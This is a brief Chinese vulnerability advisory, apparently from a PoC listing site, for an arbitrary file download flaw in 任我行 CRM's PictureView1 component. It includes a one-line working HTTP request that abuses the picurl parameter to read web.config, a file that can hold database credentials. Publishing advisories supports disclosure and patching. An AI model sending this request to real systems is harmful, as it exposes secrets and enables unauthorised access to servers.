任我行crm PictureView1-任意文件下载

日期: 2021-01-19 | 影响软件: 任我行CRM | POC: 已公开

漏洞描述

【漏洞对象】任我行crm 【涉及版本】PictureView1 【漏洞描述】任我行crm任意文件下载,可下载系统、数据库配置文件,可以导致黑客顺利进入数据库或者系统的敏感信息。导致网站或者服务器沦陷。

PoC代码

GET /Common/PictureView1/?picurl=/web.config HTTP/1.1

相关漏洞推荐